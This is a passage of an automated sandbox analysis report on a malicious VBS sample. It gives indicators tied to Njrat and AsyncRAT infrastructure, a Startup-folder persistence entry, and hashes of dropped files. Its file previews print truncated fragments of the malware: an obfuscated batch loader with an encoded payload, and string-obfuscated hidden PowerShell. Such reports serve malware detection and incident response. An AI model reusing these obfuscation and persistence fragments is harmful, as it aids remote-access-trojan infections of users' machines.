                                    • Number of non-executed functions: 2
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 7636 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: 7299_output.vbs

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    09:40:15API Interceptor199x Sleep call for process: powershell.exe modified
                                    14:41:27AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3.78.28.71TLH3anP3lh.exeGet hashmaliciousNjratBrowse
                                      r0FS3r7Ore.exeGet hashmaliciousNjratBrowse
                                        lXLWfHWHMd.exeGet hashmaliciousNjratBrowse
                                          4zeGOaTirn.exeGet hashmaliciousNjratBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            0.tcp.eu.ngrok.ioOpera.exeGet hashmaliciousZTratBrowse
                                            • 52.57.120.10
                                            YiWuyX184J.exeGet hashmaliciousNjratBrowse
                                            • 3.74.27.83
                                            TLH3anP3lh.exeGet hashmaliciousNjratBrowse
                                            • 52.57.120.10
                                            r0FS3r7Ore.exeGet hashmaliciousNjratBrowse
                                            • 3.74.27.83
                                            OLHskBFtS1.exeGet hashmaliciousNjratBrowse
                                            • 3.74.27.83
                                            lXLWfHWHMd.exeGet hashmaliciousNjratBrowse
                                            • 18.192.31.30
                                            tjK8Z8Q3JH.exeGet hashmaliciousNjratBrowse
                                            • 18.153.198.123
                                            4zeGOaTirn.exeGet hashmaliciousNjratBrowse
                                            • 3.78.28.71
                                            C9zGTJBy3T.exeGet hashmaliciousNjratBrowse
                                            • 3.125.209.94
                                            7UpMyeV5pj.exeGet hashmaliciousNjratBrowse
                                            • 3.124.142.205

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            AMAZON-02US7166_output.vbsGet hashmaliciousAsyncRATBrowse
                                            • 18.197.239.5
                                            phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                            • 52.219.193.160
                                            2.elfGet hashmaliciousUnknownBrowse
                                            • 54.126.45.88
                                            http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                            • 52.49.166.168
                                            http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                            • 52.49.166.168
                                            jew.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 99.84.2.249
                                            http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                            • 34.240.184.84
                                            http://productfocus.comGet hashmaliciousUnknownBrowse
                                            • 108.158.75.80
                                            Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                            • 13.226.94.121
                                            https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                            • 18.194.154.81

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):9713
                                            Entropy (8bit):4.940954773740904
                                            Encrypted:false
                                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                            MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                            SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                            SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                            SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                            Malicious:false
                                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2900
                                            Entropy (8bit):5.4484081111471205
                                            Encrypted:false
                                            SSDEEP:48:4jAzsSU4MmT5ajms4RIoUxqr9t5/78NKPARCxJZKaVEouYAgwd64rHLjtv2:QAzlHJTFsIfeqrh7KKdJ5Eo9Adrx2
                                            MD5:8F8532B0C5CBF392E105962F96B4B414
                                            SHA1:9071A1591DE17635670607E1FABA3F22B3E26F05
                                            SHA-256:E73BC4C85E54ADAAC649C8FF1FE013821BD070998363AF83C1FC93077D4F7994
                                            SHA-512:0A0B3A8685E50C217CBDEDA579A284F4549C59EE23EF0A04CED24914B0B4DCF7DAB43ADE6A2EF58FD2C1C6575F5A5579883428EFE94F8DD848EBBA0AB593C7AE
                                            Malicious:false
                                            Preview:@...e................................................@..........H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation4.................%...K... ...........System.Xml..<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                            Malicious:false
                                            Preview:@...e................................................@..........

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_01d0osdq.lon.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jbtlvlb.spu.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1goqza4j.s05.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52hjp2xx.zmg.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehrf15z2.1dx.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gh4wkqlb.rdt.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_joru0m5o.fd0.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovyxpdw0.cfp.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucbq43q3.y04.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uifktg4i.iwa.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_un00vi2d.psh.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjlmd5qa.1sl.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtjdmhga.kmp.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqib33zb.xhx.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\c.bat

                                            Download File
                                            Process:C:\Windows\System32\wscript.exe
                                            File Type:DOS batch file, ASCII text, with very long lines (26562), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):37584
                                            Entropy (8bit):6.03138029023125
                                            Encrypted:false
                                            SSDEEP:768:nqxZlsXeKPl8GMCnKozq7gzBmfw56m4b8jMyyzCdK:qPl+lSGrvzq7gzBHU78jYWdK
                                            MD5:C3CC3D10C8C54A96BE4862355D25E0AB
                                            SHA1:72B55F50E768FCAEECCAF3E4217AFDD177A83E4D
                                            SHA-256:C00552E52FD3548F9EC3FFE4F4A1A8628473B2281A71BC95A733DA10AE4E5A34
                                            SHA-512:6ACCC51D9A9FFA4A735BE54A838DC9AA85FFEA2238CD6C500BCCD44A408D3BAE8588EA7AAF80AA1827E10DED7D2DC561B935F63BA9C59276C2DABFDBCC58C3EB
                                            Malicious:true
                                            Preview:@echo off..setlocal enabledelayedexpansion..set "Rp=seift ifpTif=if1if &&if ifstaifrtif if""if /ifmiifnif if"..set "Um=&& ifeifxifitif"..set "Wl=nifotif ifdeiffiifnifedif pTif..if %Wl:if=% (%Rp:if=%%0 %Um:if=%)..::k4iOKIjPUfNTOHybM5OalyZ5C5kberg9LHEenXfGAhQnesJQN226hW1KTTkyVbRHhR1qsSM3MeKLtH2b5cwdGrN0FpATH8/yV88bkfQvr9+aiU144gRqrkXoQSg38QOuWY/waDqooa6VD8X8/9OWblcrnKRJ/NSpOTua/ez5Udb7z6s48bc0/ng8tlHvbgeQeuHJ5E549dY5QNZbz06GrCC+vtYRX3FVkuarw0O1GdNUypcU5mg376XOx6HmcXQrjGRVYLVQSO53JrtzE/0Qt91fr5Az6oaCz9EtW1qsMj78gOk/epDFMScaBloHv8cqSwuwJ/SrKnXrPEadQKLMRjjab1chBKKQpyB76ioNS1E49tjCWh6K4114zCMmYwdz76cJThtKg2IxUkAVvsYbJjVADKCuZMTG/8q+pbP9kEF7cjuTlpf8JMS//h8wQ8Kpv6mrYbeGIG5ypaGxxrkCVJ3+a0sO1TuYAXZSxPGOMWh24SdJUTlDRcmAI9tcpsb5nxx/kmHdM5FkAhFk+lzOrpH2oR5k9udurFDfzei19A+/OrdGFYGKqoHdiR8I3XUwQYn6lEcCJ3d+nlmi/RJ0KIlyja5xo2DY786X1VyOKsNdtO3AjBTh3AXRF4jHDMO6VWhcxkLCa4Dsyg8VOKjud4j9gxXtgGpyzwH4G+tSoj+uPU6NchfcU4A57s0nwNgC6rMakjtdtVuMF2nA6+/JbFRZ3mpMOs9RmoC2Gj0hY1Rh/W3JZj+H552ypNxaFXcioI6vy+utcLrnXdQhCn

                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:DOS batch file, ASCII text, with very long lines (26562), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):37584
                                            Entropy (8bit):6.03138029023125
                                            Encrypted:false
                                            SSDEEP:768:nqxZlsXeKPl8GMCnKozq7gzBmfw56m4b8jMyyzCdK:qPl+lSGrvzq7gzBHU78jYWdK
                                            MD5:C3CC3D10C8C54A96BE4862355D25E0AB
                                            SHA1:72B55F50E768FCAEECCAF3E4217AFDD177A83E4D
                                            SHA-256:C00552E52FD3548F9EC3FFE4F4A1A8628473B2281A71BC95A733DA10AE4E5A34
                                            SHA-512:6ACCC51D9A9FFA4A735BE54A838DC9AA85FFEA2238CD6C500BCCD44A408D3BAE8588EA7AAF80AA1827E10DED7D2DC561B935F63BA9C59276C2DABFDBCC58C3EB
                                            Malicious:true
                                            Preview:@echo off..setlocal enabledelayedexpansion..set "Rp=seift ifpTif=if1if &&if ifstaifrtif if""if /ifmiifnif if"..set "Um=&& ifeifxifitif"..set "Wl=nifotif ifdeiffiifnifedif pTif..if %Wl:if=% (%Rp:if=%%0 %Um:if=%)..::k4iOKIjPUfNTOHybM5OalyZ5C5kberg9LHEenXfGAhQnesJQN226hW1KTTkyVbRHhR1qsSM3MeKLtH2b5cwdGrN0FpATH8/yV88bkfQvr9+aiU144gRqrkXoQSg38QOuWY/waDqooa6VD8X8/9OWblcrnKRJ/NSpOTua/ez5Udb7z6s48bc0/ng8tlHvbgeQeuHJ5E549dY5QNZbz06GrCC+vtYRX3FVkuarw0O1GdNUypcU5mg376XOx6HmcXQrjGRVYLVQSO53JrtzE/0Qt91fr5Az6oaCz9EtW1qsMj78gOk/epDFMScaBloHv8cqSwuwJ/SrKnXrPEadQKLMRjjab1chBKKQpyB76ioNS1E49tjCWh6K4114zCMmYwdz76cJThtKg2IxUkAVvsYbJjVADKCuZMTG/8q+pbP9kEF7cjuTlpf8JMS//h8wQ8Kpv6mrYbeGIG5ypaGxxrkCVJ3+a0sO1TuYAXZSxPGOMWh24SdJUTlDRcmAI9tcpsb5nxx/kmHdM5FkAhFk+lzOrpH2oR5k9udurFDfzei19A+/OrdGFYGKqoHdiR8I3XUwQYn6lEcCJ3d+nlmi/RJ0KIlyja5xo2DY786X1VyOKsNdtO3AjBTh3AXRF4jHDMO6VWhcxkLCa4Dsyg8VOKjud4j9gxXtgGpyzwH4G+tSoj+uPU6NchfcU4A57s0nwNgC6rMakjtdtVuMF2nA6+/JbFRZ3mpMOs9RmoC2Gj0hY1Rh/W3JZj+H552ypNxaFXcioI6vy+utcLrnXdQhCn

                                            \Device\ConDrv

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with very long lines (2187), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):2189
                                            Entropy (8bit):5.785410013200099
                                            Encrypted:false
                                            SSDEEP:48:+ucRPgZNSxDJEcnuZxcbpzlRSRkRxgBL0BQgjbSkHkuBJNZk0UNJqU4tDWX:HVNrc+xOzl0C7gBL0BQMnfk02qtW
                                            MD5:9A9F50A15721A489CC463EA56BB61640
                                            SHA1:E232205F1F9EDEBE631279B49A1B291DEFF6B4CA
                                            SHA-256:B457E236287DB73892BE32145C8D2252C86C818EA3104E4CADCDFF188F02A0CA
                                            SHA-512:CCC6A0EB01D838670E145A80B9B247ABB2E92AC0DEEDB19782B42291C470568ABB1684ECE4CFC3016C1DDD80F6EE6D37EBEB510FD32FF0FB3CC098E5B1B84B77
                                            Malicious:false
                                            Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptograph

                                            \Device\Null

                                            Download File
                                            Process:C:\Windows\System32\timeout.exe
                                            File Type:ASCII text, with CRLF line terminators, with overstriking
                                            Category:dropped
                                            Size (bytes):53
                                            Entropy (8bit):4.538872341192371
                                            Encrypted:false
                                            SSDEEP:3:hYFnjQGARcWmFsFJQZov:hYFWmFSQZov
                                            MD5:5BFD4A973BE54A8EBC2A7F79CFCF4B6C
                                            SHA1:071E9887A3B0E5500EC2116564E4DF0962946CB6
                                            SHA-256:BBDCFB24BDD6DE329D8616497FE5F0C7F4644A484B825632339127F6E2CCA843
                                            SHA-512:F4CD10A9977B515B39946870981E9DE599040B442AE890073B6FD04DD3086CACD6F32F19888575ECB7CC5A3A0C4408513983E6CAFCBCF5B50E140F4BDCF507D9
                                            Malicious:false
                                            Preview:..Waiting for 1 seconds, press CTRL+C to quit ....0..

                                            Static File Info

                                            General

